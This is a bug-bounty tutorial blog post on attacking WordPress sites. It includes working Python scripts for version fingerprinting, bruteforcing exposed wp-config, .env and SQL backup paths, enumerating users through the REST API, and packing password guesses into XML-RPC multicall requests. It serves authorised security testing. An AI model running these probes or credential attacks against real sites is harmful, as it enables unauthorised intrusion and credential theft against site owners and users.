
5 Ways to hack WordPress targets

By blackbird-eu

February 13, 2025


Over half a billion websites run on WordPress today, and not every instance gets the security attention it needs. Coming across a bug bounty target with a vulnerable WordPress instance is therefore quite likely. Some bug bounty hunters are nonetheless put off by WordPress targets, which are often used as a blog or documentation platform and look low-value at first glance. For this reason, many skip testing these instances altogether or, at most, focus only on the lowest-hanging fruit.

In this article, we will cover several ways to identify security vulnerabilities in WordPress targets.

Let's dive in!

What is WordPress?

WordPress is a powerful content management system (CMS) that can be customized through its extensive plugin marketplace of over 70,000 plugins. WordPress can be turned into an e-commerce website, a landing page that gives a business an online presence, or simply serve as a blogging platform.

Today, there are over 500 million WordPress instances online, accounting for over 30% of all websites. Many of them do not receive the security attention they should, partly because their owners are unaware of the vulnerabilities commonly found in WordPress targets.

Example of a WordPress login page

Let's cover the most common ways to exploit vulnerable WordPress sites!

Exploiting WordPress targets

1) Enumerating outdated instances

Despite their efforts, enterprises and large organizations can quickly lose track of assets that they set up at some point and have since forgotten about. WordPress applies minor security releases automatically by default, but that can be disabled, and plugins and themes only auto-update when that is switched on for each of them. The instance you encounter may therefore well be running an older version, especially when it is self-hosted rather than run through a managed third-party service.

It's always recommended to check for outdated WordPress instances as they can be vulnerable to all sorts of security vulnerabilities, from simple cross-site scripting (XSS) issues to high-severity vulnerabilities like SQL injections.

Some WordPress instances disclose their version number in the generator meta tag (<meta name="generator" content="WordPress 6.x">). Even when that tag has been removed, the version usually leaks elsewhere: as the ?ver= query string on core stylesheets and scripts loaded from /wp-includes/, in the <generator> element of the RSS feed at /feed/, and in the stock /readme.html file that ships with every release. Automated tools like WPScan, or browser extensions such as BuiltWith or Wappalyzer, can also enumerate the version number for you.

Disclosed WordPress version number

Once you've enumerated the version number, you can look up known vulnerabilities and CVEs and their respective proof of concept.
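The following script is an added example (not part of the original article) that pulls the core version out of the four places listed above and cross-checks them, so that a site which only removed the generator tag is still fingerprinted. The HTML, feed and readme.html snippets are constructed for this example, and the version 6.4.2 in them is made up; the regexes reflect how a stock install formats these values.

```python
import re
from collections import Counter
from typing import Dict, List, Optional

# Each pattern matches one place where a stock install prints its core version.
GENERATOR_META = re.compile(
    r'<meta\s+name=["\']generator["\']\s+content=["\']WordPress\s+([\d.]+)', re.I)
# Core assets enqueued without their own version get $wp_version as ?ver=.
CORE_ASSET_VER = re.compile(r'/wp-includes/[^"\'\s?]+\?ver=([\d.]+)', re.I)
# /feed/ carries <generator>https://wordpress.org/?v=X.Y.Z</generator>.
FEED_GENERATOR = re.compile(
    r'<generator>https?://wordpress\.org/\?v=([\d.]+)</generator>', re.I)
# /readme.html prints "Version X.Y.Z" right after the logo.
README_VERSION = re.compile(r'<br\s*/?>\s*Version\s+([\d.]+)', re.I)


def _first(rx: re.Pattern, text: str) -> Optional[str]:
    m = rx.search(text)
    return m.group(1) if m else None


def _majority(values: List[str]) -> Optional[str]:
    """jQuery and other bundled libraries carry their own ?ver=, so take the
    value most assets agree on instead of the first one seen."""
    return Counter(values).most_common(1)[0][0] if values else None


def fingerprint(html: str, feed_xml: str = "", readme_html: str = "") -> Dict[str, Optional[str]]:
    """One version hint per source; None means that source leaked nothing."""
    return {
        "generator_meta": _first(GENERATOR_META, html),
        "core_asset_ver": _majority(CORE_ASSET_VER.findall(html)),
        "feed_generator": _first(FEED_GENERATOR, feed_xml),
        "readme_html": _first(README_VERSION, readme_html),
    }


def best_guess(hints: Dict[str, Optional[str]]) -> Optional[str]:
    """Majority vote across sources. Disagreement usually means a stale
    readme.html or a plugin rewriting the generator tag, so inspect the dict too."""
    return _majority([v for v in hints.values() if v])


# Constructed sample responses (not captured from a real site).
SAMPLE_HTML = """<!DOCTYPE html><html><head>
<meta name="generator" content="WordPress 6.4.2" />
<link rel='stylesheet' href='https://example.com/wp-includes/css/dist/block-library/style.min.css?ver=6.4.2' />
<link rel='stylesheet' href='https://example.com/wp-includes/css/classic-themes.min.css?ver=6.4.2' />
<script src='https://example.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1'></script>
</head><body></body></html>"""
# The same page after a "security" plugin stripped the generator tag: still leaks.
HARDENED_HTML = SAMPLE_HTML.replace('<meta name="generator" content="WordPress 6.4.2" />\n', "")
SAMPLE_FEED = "<rss><channel><generator>https://wordpress.org/?v=6.4.2</generator></channel></rss>"
SAMPLE_README = '<h1 id="logo"><img alt="WordPress" /><br /> Version 6.4.2</h1>'

if __name__ == "__main__":
    for label, page in (("stock", SAMPLE_HTML), ("generator removed", HARDENED_HTML)):
        hints = fingerprint(page, SAMPLE_FEED, SAMPLE_README)
        print(f"{label}: {hints} => {best_guess(hints)}")
```

Feed the real responses of /, /feed/ and /readme.html into fingerprint() and treat a result where the sources disagree as a reason to verify manually before hunting for CVEs against the wrong version.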

2) Exposed configuration files

Backups are crucial for any site. It does happen, however, that site admins save the backup file in the web root folder, which means any unauthenticated visitor can simply request it from the server by knowing its location.

In other cases, administrators forget to lock the installation down properly, for example by leaving directory listing enabled or by not restricting access to specific directories with an .htaccess file (or the equivalent web server configuration).

The quickest way to test for exposed configuration files is to search for files that search engines have already indexed; another way to find this kind of information disclosure is by bruteforcing file names.

Here are some common paths and files to check for:

.env
.env.bak
.env.php
wp-config-backup.php
wp-config.php.save
wp-config.php~
wp-config.php.old
error_log.log
php_error.log
wp.sql
db.sql
wpbackup.sql
mysql_backup.sql
{TARGET}.zip
{TARGET}-backup.zip
backup.zip

Make sure to change {TARGET} with your target's name.

A few patterns you could take into consideration to find more exposed backup files:

  • The trailing tilde character (~) and .save keyword are mainly used by command line editors to preserve a backup of the original file. If not removed, you'll be able to view the contents of the original file.

  • Try alternating the file extensions, web admins may have backed up data using a different file compression. Change the .zip in the list above with: .rar, .tar, .tar.gz, .bak, .gz

TIP! Try fuzzing your WordPress target with custom wordlists! Wordlists that have been specifically crafted for WordPress targets will generally yield you more results!
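As an added example (not from the original article), the script below expands the list and patterns above into every name/extension permutation and, just as important, tells a real hit from a soft-404: many sites answer every unknown path with a 200 "not found" page, so a 200 alone proves nothing and the body is matched against content signatures (a wp-config define(), a dotenv assignment, a SQL dump, a ZIP/GZIP/RAR header, a PHP error log). Note that the live wp-config.php executes and returns an empty page; only copies whose name no longer ends in .php are served as plain text. The fetch function is injected so the example runs offline against a constructed fake site; swap in a real HTTP client to use it.

```python
import re
from itertools import product
from typing import Callable, Dict, List, Optional, Tuple

# Files that end up copied next to the live one, and the names the copies take.
CONFIG_FILES = ["wp-config.php", ".env"]
EDITOR_SUFFIXES = ["~", ".save", ".bak", ".old", ".orig", ".swp", ".txt"]
CONFIG_INFIXES = ["-backup", "_backup", "-old", "-copy", "-sample"]
ARCHIVE_BASES = ["backup", "{target}", "{target}-backup", "wordpress", "public_html"]
ARCHIVE_EXTS = [".zip", ".rar", ".tar", ".tar.gz", ".tgz", ".gz", ".bak", ".7z"]
SQL_BASES = ["wp", "db", "wpbackup", "mysql_backup", "dump", "{target}"]
LOG_FILES = ["error_log", "error_log.log", "php_error.log", "wp-content/debug.log"]

# Content signatures: a 200 whose body matches none of these is treated as a soft-404.
SIGNATURES = {
    "wp-config": re.compile(rb"define\(\s*['\"]DB_(NAME|USER|PASSWORD)"),
    "dotenv": re.compile(rb"^(DB_PASSWORD|APP_KEY|DATABASE_URL)=", re.M),
    "sql-dump": re.compile(rb"^--\s*MySQL dump|^CREATE TABLE|^INSERT INTO", re.M),
    "zip": re.compile(rb"\APK\x03\x04"),
    "gzip": re.compile(rb"\A\x1f\x8b"),
    "rar": re.compile(rb"\ARar!\x1a\x07"),
    "php-log": re.compile(rb"PHP (Warning|Notice|Fatal error|Parse error)"),
}

Fetcher = Callable[[str], Tuple[int, bytes]]


def candidate_paths(target: str) -> List[str]:
    """Expand the hand-written list into every name/extension permutation."""
    paths: List[str] = []
    for f in CONFIG_FILES:
        paths.append(f)
        paths += [f + s for s in EDITOR_SUFFIXES]              # wp-config.php~, .env.bak, ...
    paths += ["wp-config" + i + ".php" for i in CONFIG_INFIXES]  # wp-config-backup.php, ...
    for base, ext in product(ARCHIVE_BASES, ARCHIVE_EXTS):
        paths.append(base.format(target=target) + ext)           # example-backup.zip, ...
    paths += [b.format(target=target) + ".sql" for b in SQL_BASES]
    paths += LOG_FILES
    return list(dict.fromkeys(paths))                            # de-duplicate, keep order


def classify(body: bytes) -> Optional[str]:
    """Name of the first matching signature, or None for an unrecognised body."""
    for kind, rx in SIGNATURES.items():
        if rx.search(body):
            return kind
    return None


def scan(base_url: str, target: str, fetch: Fetcher) -> List[Tuple[str, str]]:
    """fetch(url) -> (status, body). Returns (path, kind) for confirmed leaks only."""
    hits = []
    for path in candidate_paths(target):
        status, body = fetch(f"{base_url.rstrip('/')}/{path}")
        if status == 200 and (kind := classify(body)):
            hits.append((path, kind))
    return hits


# Constructed stand-in for a target that answers every unknown path with a 200 page.
FAKE_SITE: Dict[str, Tuple[int, bytes]] = {
    "/wp-config.php": (200, b""),   # the live file executes; nothing comes back
    "/wp-config.php~": (200, b"<?php\ndefine( 'DB_NAME', 'wp' );\ndefine( 'DB_PASSWORD', 'hunter2' );\n"),
    "/example-backup.zip": (200, b"PK\x03\x04" + bytes(26)),
}


def fake_fetch(url: str) -> Tuple[int, bytes]:
    return FAKE_SITE.get(url.split("example.com", 1)[1], (200, b"<html>Page not found</html>"))


if __name__ == "__main__":
    for path, kind in scan("https://example.com", "example", fake_fetch):
        print(f"{path}: {kind}")
```

Against the fake site only the editor backup of wp-config.php and the site archive are reported; the live wp-config.php (empty body) and the catch-all 200 pages are filtered out.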

3) Misconfigured security settings

During the initial setup, WordPress admins may forget to enable or disable a security setting or otherwise deviate from best practices, and this can introduce side effects such as sensitive information disclosure. Let's take a look at common security misconfigurations found in WordPress setups.

Open registration

When the option "Anyone can register" is enabled, anyone can create an account. New accounts receive the role configured under "New User Default Role" (Subscriber by default), so this alone rarely grants much, but it turns an anonymous attacker into an authenticated one, and many plugin vulnerabilities require nothing more than a subscriber-level login. The feature is legitimately useful when WordPress admins want to build a community and let new people sign up and interact with each other.

Sometimes this feature was only meant to be enabled temporarily, for testing during the initial setup for example. If it was never turned off, you can visit /wp-login.php?action=register (older versions also served /wp-register.php) and sign up for an account.

Example of an open WordPress registration page

Directory listing enabled

Directory listings allow visitors to list the contents of a web directory. They only appear when the web server has listing enabled and no index file is present in that directory. For this reason, it's best practice to disable listing server-wide (Options -Indexes in Apache, autoindex off; in nginx) to prevent information disclosure.

When testing WordPress targets, request the directories directly and look for listings. WordPress ships a placeholder index.php in /wp-content, /wp-content/plugins and /wp-content/themes, but /wp-content/uploads, where all uploaded media ends up, has none by default, which makes it the most common place to find a listing.

Directory listing of /wp-content/uploads

TIP! Google dorking can help you easily find directory listings on your WordPress targets!

WordPress user enumeration via REST API

WordPress provides a REST API so external applications can talk to your WordPress instance. One endpoint in particular lets us enumerate the site's authors: for each account it returns the numeric ID, the display name and the slug, and the slug is the user's nicename, which WordPress derives from the login username unless it was changed later. Email addresses are not included in unauthenticated responses.

Simply visiting one of the following endpoints on a vulnerable WordPress target lists the current authors: /wp-json/wp/v2/users or /wp-json/wp/v2/users/1. Note that unauthenticated requests only return users who have authored published content; accounts that never published anything do not show up here.

WordPress REST API disclosing sensitive author information

Of course, developers will try to block access to these endpoints, but simple measures and weak validations can often be bypassed. For example, WordPress also accepts the route in a rest_route query parameter on the site root, which serves the same REST routes and is particularly useful when the server or a firewall blocks every request whose path starts with /wp-json:

/?rest_route=/wp/v2/users

Note that the route is given without the /wp-json prefix. This request returns the same response as /wp-json/wp/v2/users would. Another fallback that predates the REST API is /?author=1, which redirects to /author/<nicename>/ and thereby discloses the login name of user ID 1.

4) Weak credentials

Some users choose convenience over security and pick a weak, easy-to-guess username and password combination. Using the usernames gathered through the enumeration techniques above, we can test for weak credentials and attempt to gain authenticated access.

Next time you test WordPress targets, include tests for default and weak credentials.

TIP! When enabled, the XML-RPC endpoint (/xmlrpc.php) offers another place to test credentials: the wp.getUsersBlogs method acts as a login oracle, and system.multicall lets you pack many login attempts into a single HTTP request, which sidesteps per-request rate limits and lockout plugins that only watch wp-login.php. Keep in mind that WordPress 4.4 and later fail every remaining login in a multicall once one attempt has failed, so the amplification only pays off against old instances; single wp.getUsersBlogs calls still work as an oracle on current versions.
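The script below is an added example (not part of the original article) that ties the enumeration and credential sections together: it builds both spellings of the users route, pulls login names out of a REST users response and out of an /?author=N redirect, packs candidate credential pairs into a system.multicall request for /xmlrpc.php, and separates successful logins from the per-call fault structs in the reply. The JSON, the credentials ("jdoe"/"Winter2025!") and the XML-RPC reply are constructed for this example; the reply has the shape WordPress produces, with a {faultCode, faultString} struct for a failed call and the caller's blog list for a successful one. Remember the WordPress 4.4 caveat from the tip above when reading a multicall reply from a current install: everything after the first failure is rejected without being checked.

```python
import json
import re
import xmlrpc.client
from typing import List, Optional, Sequence, Tuple

Credential = Tuple[str, str]


def user_enum_urls(base: str) -> List[str]:
    """Both spellings of the users route; the second survives a path block on /wp-json."""
    base = base.rstrip("/")
    return [f"{base}/wp-json/wp/v2/users", f"{base}/?rest_route=/wp/v2/users"]


def logins_from_rest(users_json: str) -> List[str]:
    """`slug` is the user_nicename, derived from the login name unless renamed."""
    return [u["slug"] for u in json.loads(users_json) if isinstance(u, dict) and u.get("slug")]


def login_from_author_redirect(location: str) -> Optional[str]:
    """/?author=N answers with a redirect to /author/<nicename>/; read it from Location."""
    m = re.search(r"/author/([^/?#]+)/?", location)
    return m.group(1) if m else None


def build_multicall(candidates: Sequence[Credential]) -> str:
    """One request body carrying one wp.getUsersBlogs call per credential pair."""
    calls = [{"methodName": "wp.getUsersBlogs", "params": [user, pw]} for user, pw in candidates]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def parse_multicall(candidates: Sequence[Credential], response_xml: str) -> List[Credential]:
    """Pairs whose call succeeded. A failed login is a {faultCode, faultString}
    struct inside the result array, not a top-level <fault>."""
    (results,), _ = xmlrpc.client.loads(response_xml)
    valid = []
    for cred, result in zip(candidates, results):
        if isinstance(result, dict) and "faultCode" in result:
            continue
        valid.append(cred)
    return valid


# Constructed sample data (not captured from a real target).
SAMPLE_USERS_JSON = json.dumps([
    {"id": 1, "name": "Site Admin", "slug": "admin", "link": "https://example.com/author/admin/"},
    {"id": 3, "name": "Jane Doe", "slug": "jdoe", "link": "https://example.com/author/jdoe/"},
])
CANDIDATES: List[Credential] = [("admin", "admin"), ("jdoe", "Winter2025!")]
# What xmlrpc.php would answer if only the second pair were valid.
SAMPLE_RESPONSE = xmlrpc.client.dumps((
    [
        {"faultCode": 403, "faultString": "Incorrect username or password."},
        [[{"blogid": "1", "blogName": "Example", "isAdmin": True,
           "url": "https://example.com/", "xmlrpc": "https://example.com/xmlrpc.php"}]],
    ],
), methodresponse=True)

if __name__ == "__main__":
    print(user_enum_urls("https://example.com"))
    print(logins_from_rest(SAMPLE_USERS_JSON))
    print(login_from_author_redirect("https://example.com/author/admin/"))
    print(build_multicall(CANDIDATES))
    print(parse_multicall(CANDIDATES, SAMPLE_RESPONSE))
```

To use it against a target, POST the output of build_multicall() to /xmlrpc.php with Content-Type text/xml and hand the response body to parse_multicall(); the candidate list and the result array line up by position.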

5) Exploiting vulnerable WordPress plugins and themes

WordPress plugins and themes are a goldmine for bug bounty hunters. They add new capabilities to a standalone WordPress instance, and with a marketplace of over 70,000 plugins, each one adding new endpoints, features and functionality, coming across a vulnerable plugin is quite likely.

A quick way to check for vulnerable plugins and themes is to first enumerate all enabled extensions on your WordPress target. One way to do so is to look at the page source for scripts and stylesheets loaded from /wp-content/plugins/<slug>/ and /wp-content/themes/<slug>/. Another way is bruteforcing plugin names, a technique @0xLupin shared with us in a Bug Bounty Tip.

Once you've come across an enabled plugin, enumerate its version number (for plugins hosted on wordpress.org, the readme.txt in the plugin folder states it under "Stable tag") and search for known CVEs and their respective proofs of concept!

TIP! WPScan maintains a database of vulnerable WordPress plugins and themes!
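As an added example (not from the original article), the script below performs both enumeration steps described in this section: it extracts plugin and theme slugs, with any ?ver= value, from asset URLs in the page source, and it bruteforces a slug list by probing /wp-content/plugins/<slug>/ and the plugin's readme.txt, reading the version from the "Stable tag" line. The ?ver= on a plugin asset is whatever the developer passed to wp_enqueue_script/style and may be the plugin version, a hash, or the core version, so readme.txt is the more reliable source where it exists. The sample HTML, the readme and the fake responses are constructed; contact-form-7 and astra are real slugs with made-up versions, custom-crm-connector is a hypothetical slug, and the fetch function is injected so the example runs offline.

```python
import re
from typing import Callable, Dict, List, Optional, Set, Tuple

Fetcher = Callable[[str], Tuple[int, bytes]]

# Any asset URL under wp-content/plugins/<slug>/ or wp-content/themes/<slug>/ names the extension.
ASSET_PATH = re.compile(r"/wp-content/(plugins|themes)/([A-Za-z0-9._-]+)/([^\"'\s<>]*)")
VER_PARAM = re.compile(r"[?&]ver=([^&\"'\s]+)")
# readme.txt of a wordpress.org-hosted plugin starts with "=== Name ===" and has a Stable tag line.
README_HEADER = re.compile(r"^=== .+ ===", re.M)
STABLE_TAG = re.compile(r"^Stable tag:\s*([\w.]+)", re.M | re.I)


def extensions_from_html(html: str) -> Dict[Tuple[str, str], Set[str]]:
    """(kind, slug) -> set of ?ver= values seen on that extension's assets."""
    found: Dict[Tuple[str, str], Set[str]] = {}
    for kind, slug, rest in ASSET_PATH.findall(html):
        versions = found.setdefault((kind, slug), set())
        m = VER_PARAM.search(rest)
        if m:
            versions.add(m.group(1))
    return found


def is_readme(body: bytes) -> bool:
    return bool(README_HEADER.search(body.decode("utf-8", "replace")))


def version_from_readme(body: bytes) -> Optional[str]:
    """Stable tag value, or None when the body is not a readme or the tag is 'trunk'."""
    if not is_readme(body):
        return None
    m = STABLE_TAG.search(body.decode("utf-8", "replace"))
    return m.group(1) if m and m.group(1).lower() != "trunk" else None


def probe_plugins(base_url: str, slugs: List[str], fetch: Fetcher) -> Dict[str, Optional[str]]:
    """slug -> version for slugs that exist. A real readme confirms the plugin;
    a 403 on the directory confirms it without a version (listing denied, no
    readme). A 200 directory with no readme is ambiguous (could be a soft-404) and is skipped."""
    base = base_url.rstrip("/")
    present: Dict[str, Optional[str]] = {}
    for slug in slugs:
        dir_status, _ = fetch(f"{base}/wp-content/plugins/{slug}/")
        if dir_status == 404:
            continue
        rd_status, rd_body = fetch(f"{base}/wp-content/plugins/{slug}/readme.txt")
        if rd_status == 200 and is_readme(rd_body):
            present[slug] = version_from_readme(rd_body)
        elif dir_status == 403:
            present[slug] = None
    return present


# Constructed page source and fake target (not captured from a real site).
SAMPLE_HTML = """<html><head>
<link rel='stylesheet' href='https://example.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.8.6' />
<link rel='stylesheet' href='https://example.com/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.6.4' />
<script src='https://example.com/wp-content/plugins/custom-crm-connector/js/app.js'></script>
</head></html>"""
FAKE_SITE: Dict[str, Tuple[int, bytes]] = {
    "/wp-content/plugins/contact-form-7/": (403, b"Forbidden"),
    "/wp-content/plugins/contact-form-7/readme.txt":
        (200, b"=== Contact Form 7 ===\nRequires at least: 6.3\nStable tag: 5.8.6\n"),
    "/wp-content/plugins/custom-crm-connector/": (403, b"Forbidden"),   # in-house plugin, no readme
}


def fake_fetch(url: str) -> Tuple[int, bytes]:
    return FAKE_SITE.get(url.split("example.com", 1)[1], (404, b"Not Found"))


if __name__ == "__main__":
    print(extensions_from_html(SAMPLE_HTML))
    print(probe_plugins("https://example.com", ["contact-form-7", "custom-crm-connector", "woocommerce"], fake_fetch))
```

Feed the slugs found in the page source, plus a wordlist of popular plugin slugs, into probe_plugins(); the versions it returns are what you look up in the WPScan database.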

Conclusion

We've covered several ways to find security vulnerabilities in WordPress targets, from exposing sensitive data to gaining code execution through vulnerable plugins. Luckily for us, we don't have to perform all these checks by hand; tools like WPScan automate most of them and let us scan for vulnerabilities at scale.

You’ve just learned how to hack WordPress targets and find high-severity vulnerabilities… Right now, it’s time to put your skills to the test! Browse through our 70+ public bug bounty programs on Intigriti, and who knows, maybe your next bounty will be earned with us!
